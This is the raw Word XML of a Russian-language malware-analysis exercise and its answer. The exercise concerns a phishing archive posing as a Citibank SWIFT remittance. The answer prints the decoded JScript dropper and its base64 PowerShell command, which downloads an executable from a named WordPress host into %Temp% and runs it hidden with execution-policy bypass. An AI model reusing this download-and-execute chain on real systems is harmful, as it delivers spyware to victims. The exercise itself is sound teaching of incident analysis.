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3ACE3" w14:textId="1AD4708E" w:rsidR="00487D6A" w:rsidRPr="00BE4F71" w:rsidRDefault="00487D6A" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE4F71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Задача</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC30CE" w14:textId="77777777" w:rsidR="00FF0900" w:rsidRDefault="00FF0900" w:rsidP="00FF0900">
      <w:r>
        <w:t>Исследователю ВПО передали на исследование архивный файл (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF09A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CITIBANK TELEX </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF09A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REMITTANCE.rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), содержащий необычный файл (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF09A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SWIFT COPY - MT-103.jse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), который получил по почте один из пользователей крупной компании. Пользователь сообщил, что специалисты ИБ его компании обнаружили на его компьютере, после запуска данного файла процесс с именем исполняемого файла: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF09A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UJHYTGD.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF09A9">
        <w:t>который был идентифицирован как шпионское ВПО, а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сам файл был значительно больше в размере, чем файл </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Руководитель организации поставил задачу исследователю ВПО – установить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF09A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">с которого был загружен данный вредоносный файл и определить все возможные местоположения данного файла, после его загрузки из сети Интернет. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391911BF" w14:textId="7CE01483" w:rsidR="00FF0900" w:rsidRPr="00A77FE0" w:rsidRDefault="00FF0900" w:rsidP="00FF0900">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(внимание – исследование файла следует проводить на виртуальной машине. Некоторые антивирусы определяют данные файлы и сам архив, как ВПО</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk167462377"/>
      <w:r w:rsidRPr="00A77FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000942E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Сам файл на сайте отсутствует, таким образом скрипт не сможет его загрузить и активировать</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00A77FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9FE509" w14:textId="7C5D32E3" w:rsidR="00487D6A" w:rsidRDefault="00BB52E2" w:rsidP="00487D6A">
      <w:r>
        <w:t>Ответ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3D899" w14:textId="5E5BBC83" w:rsidR="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">это расширение зашифрованного скрипта </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">В настоящее время есть приложения для его расшифровки, в том числе и в сети Интернет (чаще можно найти сайт для расшифровки </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:t>*.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файлов, а так как алгоритм шифрования одинаковый – расшифровать файл </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:t>*.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">можно также как и </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:t>*.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A7363" w14:textId="08DF50DD" w:rsidR="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:r>
        <w:t>После расшифровки получим:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD8E066" w14:textId="4F83B74C" w:rsidR="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ActiveXObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wScrIpt.SHelL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>").RUN(                        '"powERShELL.exe"                                                 POWERShELl.exE                         -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">                         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ByPaSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">                         -NOP                         -w                         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>hiDden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">                         -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Ec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">                         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                         '                        ,                        0                        )                        ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915C434" w14:textId="77777777" w:rsidR="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BBB4DD" w14:textId="770D017A" w:rsidR="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Этот скрипт на </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>*.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409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">запускает </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B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передвет</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> ей закодированную по алгоритму </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>последовательность команд (Внимание! Кодировка</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409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UTF-16LE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B99BD6D" w14:textId="0B84253E" w:rsidR="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                         (NEW-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OBjEcT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysTem.NET.webclIenT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DownLoADFilE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(                         ”http://bacau.ro/wp-content/XDFBGJGF.exe”                         ,                         ”$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eNv:tEmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">\UJHYTGD.exe”                         )                         </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">;                         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cMd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                         /C                         ”$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ENv:tEMp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\UJHYTGD.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02624437" w14:textId="77777777" w:rsidR="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3237C992" w14:textId="333344C4" w:rsidR="00A409B1" w:rsidRPr="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, ВПО скачивается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bacau</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XDFBGJGF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F9290B" w14:textId="578C6A57" w:rsidR="00A409B1" w:rsidRPr="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Сохранение ВПО происходит в каталоге: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>%\</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UJHYTGD</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FBF01" w14:textId="48FDF6F3" w:rsidR="00A409B1" w:rsidRPr="00A409B1" w:rsidRDefault="00A409B1" w:rsidP="00487D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Запуск ВПО происходит из того же каталога: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%\</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UJHYTGD</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A409B1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A409B1" w:rsidRPr="00A409B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8763A" w14:textId="77777777" w:rsidR="00AD0C1A" w:rsidRDefault="00AD0C1A" w:rsidP="00BE4F71">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="315BEBD6" w14:textId="77777777" w:rsidR="00AD0C1A" w:rsidRDefault="00AD0C1A" w:rsidP="00BE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89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9C985" w14:textId="43501673" w:rsidR="00BE4F71" w:rsidRDefault="00BE4F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8222A" w14:textId="77777777" w:rsidR="00BE4F71" w:rsidRDefault="00BE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BA3B6" w14:textId="77777777" w:rsidR="00AD0C1A" w:rsidRDefault="00AD0C1A" w:rsidP="00BE4F71">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="780273D9" w14:textId="77777777" w:rsidR="00AD0C1A" w:rsidRDefault="00AD0C1A" w:rsidP="00BE4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19"/>
    <w:rsid w:val="00016C19"/>
    <w:rsid w:val="000942E0"/>
